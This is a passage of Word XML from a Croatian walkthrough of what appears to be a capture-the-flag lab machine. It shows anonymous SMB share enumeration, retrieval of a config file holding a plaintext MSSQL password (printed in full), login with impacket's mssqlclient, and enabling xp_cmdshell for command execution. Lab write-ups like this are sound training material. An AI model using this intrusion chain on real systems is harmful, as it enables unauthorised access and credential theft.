        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00976554">
        <w:t>broja porta i naziva servisa uz ključnu riječ „exploit“ saznajemo da je:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31CB75" w14:textId="0AB34545" w:rsidR="00976554" w:rsidRDefault="00976554" w:rsidP="00976554">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NetBios protokol otvoren na portu 139/TCP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3A801" w14:textId="105BD1A6" w:rsidR="00976554" w:rsidRDefault="00976554" w:rsidP="00976554">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SMB (</w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Server Message Block</w:t>
      </w:r>
      <w:r>
        <w:t>) usluga otvorena na portu 445/TCP i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43503B99" w14:textId="5C883ACE" w:rsidR="00976554" w:rsidRDefault="00976554" w:rsidP="00976554">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MSSQL (</w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Microsoft SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>) otvoren na portu 1433</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144E772" w14:textId="447C6A59" w:rsidR="00976554" w:rsidRDefault="00976554" w:rsidP="00976554">
      <w:r>
        <w:t xml:space="preserve">Za NetBios nismo pronašli nikakvi zanimljiv </w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:t>no za</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB servis postoji </w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00976554">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alat koji dolazi već instaliran uz Kali Linux.</w:t>
      </w:r>
      <w:r w:rsidR="004459AD">
        <w:t xml:space="preserve"> Smbmap pokrećemo naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597CD80" w14:textId="2200AB39" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:t>sudo smbmap -H 10.10.10.27 -u " " -p " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559BF56" w14:textId="77777777" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD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52B6C4C3" wp14:editId="0A52D766">
            <wp:extent cx="5753735" cy="1130300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A308" w14:textId="7A644AFA" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD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16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Smbmap skeniranje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25EEBE" w14:textId="77777777" w:rsidR="004459AD" w:rsidRPr="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD"/>
    <w:p w14:paraId="1DDAE8B9" w14:textId="65A73A9B" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD">
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avjet :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Uputu kako koristiti Nmap skeniranje možete pronaći na slici 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B802C97" w14:textId="5F3B865A" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD"/>
    <w:p w14:paraId="42188833" w14:textId="77777777" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD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2D0C2F3E" wp14:editId="7C9FEAC4">
            <wp:extent cx="4054415" cy="3598456"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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740" cy="360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214F" w14:textId="416B96B1" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD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17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Smbmap upute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A5310" w14:textId="6C44B33B" w:rsidR="004459AD" w:rsidRPr="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">U rezultatu izvršavanja </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-a među </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NO_ACCESS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> folderima uočavamo </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>READ_ONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">direktorij </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">„backsups“. </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:t>Ko</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risteći naredbu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD3DCC" w14:textId="77777777" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:t>sudo smbmap -H 10.10.10.27 -u " " -p " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724DA74" w14:textId="77777777" w:rsidR="004459AD" w:rsidRDefault="004459AD" w:rsidP="004459AD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00807619" wp14:editId="365C1D13">
            <wp:extent cx="5244861" cy="1806082"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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01" cy="180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52D8" w14:textId="16AF082F" w:rsidR="00976554" w:rsidRDefault="004459AD" w:rsidP="004459AD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18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Smbclient skeniranje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3EF4E" w14:textId="5DFA7599" w:rsidR="00976554" w:rsidRDefault="004459AD" w:rsidP="00976554">
      <w:r>
        <w:t xml:space="preserve">Možemo pristupiti sadržaju direktorija </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„backups“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te upisivanjem </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">naredbe unutar </w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:r>
        <w:t>-a izlistajemo sav sadržaj unutar direktorija. Unutar direktorija vidimo datoteku „</w:t>
      </w:r>
      <w:r w:rsidRPr="004459AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>prod.dtsConfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“ koju možemo skinuti na naše lokalno računalo naredbom </w:t>
      </w:r>
      <w:r w:rsidR="0034549B" w:rsidRPr="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>get prod.dtsConfig</w:t>
      </w:r>
      <w:r w:rsidR="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E5335" w14:textId="35899AA5" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="00976554">
      <w:r>
        <w:t xml:space="preserve">Preko </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-a saznajemo da je </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DTSCONFIG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>datoteka XML (</w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Extensible Markup Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) konfiguracija za SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Server Integration Services</w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:t xml:space="preserve"> (SSIS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Pošto smo preko </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-a otkrili da je MSSQL otvoren na </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-u 1443/TCP, </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>pretpostavimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je da  „</w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>prod.dtsConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:t>datoteka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> povezana s tom uslugom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B031A9" w14:textId="28263F40" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="00976554">
      <w:r>
        <w:t>Sljedeće, na lokalnoj mašini locirajte skinutu „</w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>prod.dtsConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidRPr="0034549B">
        <w:t>datotek</w:t>
      </w:r>
      <w:r>
        <w:t>u te izlistajte njezin sadržaj s naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31655803" w14:textId="7D46475C" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="0034549B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ cat prod.dtsConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354DDD8" w14:textId="77777777" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="0034549B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52B67271" wp14:editId="133E518C">
            <wp:extent cx="5253487" cy="1730322"/>
            <wp:effectExtent l="0" t="0" r="4445" b="381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558" cy="17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4840" w14:textId="661ADC4B" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="0034549B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19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Sadržaj prod.dtsConfig datoteke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B235572" w14:textId="2C3A884F" w:rsidR="0034549B" w:rsidRDefault="00E35BBA" w:rsidP="0034549B">
      <w:r>
        <w:t>Primijetite</w:t>
      </w:r>
      <w:r w:rsidR="0034549B">
        <w:t xml:space="preserve"> u lozinku i korisničko ime unutar „</w:t>
      </w:r>
      <w:r w:rsidR="0034549B" w:rsidRPr="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>prod.dtsConfig</w:t>
      </w:r>
      <w:r w:rsidR="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="0034549B" w:rsidRPr="0034549B">
        <w:t>datotek</w:t>
      </w:r>
      <w:r w:rsidR="0034549B">
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03601E5B" w14:textId="13150D06" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="0034549B">
      <w:r w:rsidRPr="0034549B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lozinka = M3g4c0rp123; Korisničko ime = ARCHETYPE\sql_svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A16B15" w14:textId="27A6C0CA" w:rsidR="0034549B" w:rsidRDefault="0034549B" w:rsidP="00217F6A">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc75785394"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="433ED794" w14:textId="5CE12C92" w:rsidR="00217F6A" w:rsidRDefault="00217F6A" w:rsidP="00217F6A"/>
    <w:p w14:paraId="4577B4C8" w14:textId="73D13399" w:rsidR="00217F6A" w:rsidRDefault="00217F6A" w:rsidP="0083791F">
      <w:pPr>
        <w:ind w:firstLine="576"/>
      </w:pPr>
      <w:r>
        <w:t>Nakon</w:t>
      </w:r>
      <w:r w:rsidR="0083791F">
        <w:t xml:space="preserve"> što smo pronašli lozinku i korisničko ime, gotovi smo s enumeracijom sustava te krećemo s </w:t>
      </w:r>
      <w:r w:rsidR="0083791F" w:rsidRPr="0083791F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>foothold</w:t>
      </w:r>
      <w:r w:rsidR="0083791F">
        <w:t xml:space="preserve">-om. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB579BB" w14:textId="05F4B493" w:rsidR="0083791F" w:rsidRDefault="0083791F" w:rsidP="0083791F">
      <w:r>
        <w:t xml:space="preserve">Nakon kratkog </w:t>
      </w:r>
      <w:r w:rsidRPr="0083791F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>googlanja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na </w:t>
      </w:r>
      <w:r w:rsidRPr="0083791F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GitHubu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pronalazimo „</w:t>
      </w:r>
      <w:r w:rsidRPr="0083791F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mssqlclient</w:t>
      </w:r>
      <w:r>
        <w:t>“ skriptu koja nam omogućava spajanje na MSSQL servis koristeći lozinku, korisničko ime te IPv4 adresu računala na kojeg se spajamo kao parametre.</w:t>
      </w:r>
      <w:r w:rsidR="00E90794">
        <w:t xml:space="preserve"> Skriptu skidamo na lokalno računalo naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A822DD" w14:textId="29DFF489" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E90794">
        <w:t>wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8EE4D" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="0083791F">
      <w:r>
        <w:t>No, pri pokretanju skripte se javi sljedeći error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761362F" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794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5F29BCA1" wp14:editId="062C6C3A">
            <wp:extent cx="5477773" cy="2151572"/>
            <wp:effectExtent l="0" t="0" r="8890" b="127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417" cy="215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B22C" w14:textId="1F3D1062" w:rsidR="0034549B" w:rsidRPr="0034549B" w:rsidRDefault="00E90794" w:rsidP="00E90794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20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Skidanje mssqlclient skripte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E0B9D" w14:textId="6BB57CA1" w:rsidR="00655239" w:rsidRDefault="00E90794" w:rsidP="00C66C3B">
      <w:r>
        <w:t>Izgleda da Kali Linux ne može otvoriti skinutu „</w:t>
      </w:r>
      <w:r w:rsidRPr="0083791F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mssqlclient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“ skriptu. Nakon </w:t>
      </w:r>
      <w:r w:rsidRPr="00E90794">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>googlanja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>problema saznali smo da „</w:t>
      </w:r>
      <w:r w:rsidRPr="0083791F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mssqlclient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“ skripta dolazi već instalirana s Kali Linuxom te ju možemo locirati s naredbom </w:t>
      </w:r>
      <w:r w:rsidRPr="00E90794">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>locate mssqlclient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unutar terminala. Kada locirate </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>skriptu</w:t>
      </w:r>
      <w:r>
        <w:t>, izvršite ju ovom naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E9CC0" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00021573">
        <w:t>python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A30DF" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794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704334E7" wp14:editId="7DF6F331">
            <wp:extent cx="5762625" cy="1380490"/>
            <wp:effectExtent l="0" t="0" r="9525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8DAA" w14:textId="00A85906" w:rsidR="00E90794" w:rsidRPr="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794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21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Spajanje na SQL server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C380891" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00C66C3B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sada operiramo unutar SQL servera. Naredbom </w:t>
      </w:r>
      <w:r w:rsidRPr="00E90794">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unutar SQL servera otkrijemo dodatne </w:t>
      </w:r>
      <w:r w:rsidRPr="00E90794">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> naredbe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511A430" w14:textId="77777777" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794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3CC387A3" wp14:editId="43464EC4">
            <wp:extent cx="5753735" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="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A665" w14:textId="188D71CA" w:rsidR="00E90794" w:rsidRDefault="00E90794" w:rsidP="00E90794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22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A3DDF">
        <w:t>Naredbe SQL servera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C92268" w14:textId="24CFC02D" w:rsidR="008172B2" w:rsidRPr="008172B2" w:rsidRDefault="003E14C2" w:rsidP="00E90794">
      <w:r>
        <w:t>Me</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">u dodatnim </w:t>
      </w:r>
      <w:r w:rsidRPr="003E14C2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="003E14C2">
        <w:t xml:space="preserve"> naredbama vidimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> naredbu </w:t>
      </w:r>
      <w:r w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_xp_cmdsehll</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve">koju potom izvršimo unutar samog SQL Servera te dobijemo poruku da moramo ponovno konfigurirat server s naredbom </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reconfigure</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve"> što smo i napravili. Među dodatnim </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="003E14C2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="003E14C2">
        <w:t xml:space="preserve"> naredbama</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve"> je i naredba </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve">uz koju stoji da „izvršava </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve"> koristeći </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve">“. Pa smo probali iskoristiti jednu od običnih </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows cmd</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve">naredbi </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:t>te</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t xml:space="preserve"> smo dobili željeni rezultat. Uspjeli smo pristupiti </w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
